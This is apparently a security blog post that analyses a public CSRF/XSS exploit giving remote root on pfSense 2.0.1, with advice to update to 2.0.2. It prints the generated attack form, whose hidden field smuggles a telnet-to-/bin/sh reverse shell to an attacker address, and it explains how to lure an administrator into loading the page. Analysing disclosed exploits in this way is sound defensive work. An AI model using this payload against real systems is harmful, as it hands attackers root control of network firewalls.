Analyzing the pfSense 2.0.1 XSS Remote Command Execution Exploit

If you have any pfSense systems running software version 2.0.1 I would advise immediately updating them to 2.0.2. Version 2.0.1 contains a cross-site scripting vulnerability which can give a remote attacker root access to the targeted pfSense system.

The code for this exploit has now been released publicly making it even more important to apply the update.

I was curious to see how this exploit worked so I decided to test it out against one of the pfSense systems on my local network.

Exploit Details

This exploit allows an attacker to gain remote root access to the pfSense system through a  XSS vulnerability in the web gui.  The attacker sets up two Netcat listeners on their system, one is used for sending commands and the other is used for capturing the output.

To execute the exploit the attacker sends an HTML link to the victim.  Once the victim clicks on the link sent by the attacker a remote shell is spawned on the attackers system through the Netcat listeners.

I’ve tested the exploit and was able to successfully obtain a root shell against pfSense with either HTTP or HTTPS enabled on the web interface.

Limitations

While this is considered a high risk vulnerabilty in pfSense the attack does have several conditions that must be met in order for it to work.

  1. The victim must already have admin access to the pfSense web gui.
  2. The victim must be logged into the web gui prior to clicking on the exploit link.
  3. The attacker must know the LAN IP of the victims pfSense system.
  4. The victims pfSense box must be able to connect to both of the Netcat listeners.

In reality these conditions are not very difficult to meet.  Most administrators will have the cookie set to automatically log into the web gui for pfSense.

An attacker who already has access to the LAN network which the system resides on will have no difficulty obtaining the LAN IP address.  LAN attackers would also not need to worry about outbound firewall rules restricting the Netcat reverse shell connections.

The Exploit Code

The author of this exploit has made it very easy for anyone who wants use the code against a target system.  Within the exploit code is a CSRF generator which can be used easily craft the attack.

###################################################################
# Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access
# Date: 04/01/2013
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.0.1
# Category: XSS & CSRF Remote root Access
# Google dork:
# Tested on: FreeBSD
######################################################################

 

Using the CSRF Generator

Using the HTML generator the attacker simply needs to fill out a few forms and the exploit code is dynamically generated.  The page even provides the commands to set up the Netcat sender and receiver.

  1. Open two command prompts and run each of the Netcat commands listed, one in each shell.
  2. Enter the URL for the web interface of the target system.  For HTTPS use https://<IP-ADDRESS>:443/.
  3. Enter the LAN IP of the target system.
  4. Save the generated HTML code as a new file.

pfSense CSRF Generator

Looking at the Generated Code

Let’s take a look at the HTML code generated to see what it’s actually doing.

From the first line we can see the code is using a post method against the system_firmware.php file.

action=’http://192.168.1.1:80/system_firmware.php’ method=’post’

The code is being posted to a hidden input called kerneltype with a value of SMP.  Following the semicolon  we can see the actual payload of the exploit itself.  The payload spawns a telnet session to the attackers machine and runs /bin/sh creating a shell.  The output of the shell is redirected to another telnet session on port 1338.

<input type=’hidden’ name=’kerneltype’ value=’SMP > /boot/kernel/pfsense_kernel.txt;telnet 192.168.1.100 1337 | /bin/sh | telnet 192.168.1.100 1338′ /></form><script>document.forms[‘x’].submit();

Launching the Attack

To execute the exploit the attacker needs to find a way for the victim to load the HTML code that was generated in the previous step.  The attacker could chose to do this in a number of ways.  For example; email the code to the victim as an attachment, or host the code on a web server and email the victim a link to the code.

Once the code is executed the target system will connect back to both Netcat sessions.

Netcat Sender

pfSense Remote Shell - Sender

Netcat Receiver

pfSense Remote Shell - Receiver

Video Demonstration

Check out the video below to see the exploit in action.

Sam Kear

Sam graduated from the University of Missouri - Kansas City with a bachelors degree in Information Technology. Currently he works as a network analyst for an algorithmic trading firm. Sam enjoys the challenge of troubleshooting complex problems and is constantly experimenting with new technologies.

Leave a Reply

Your email address will not be published. Required fields are marked *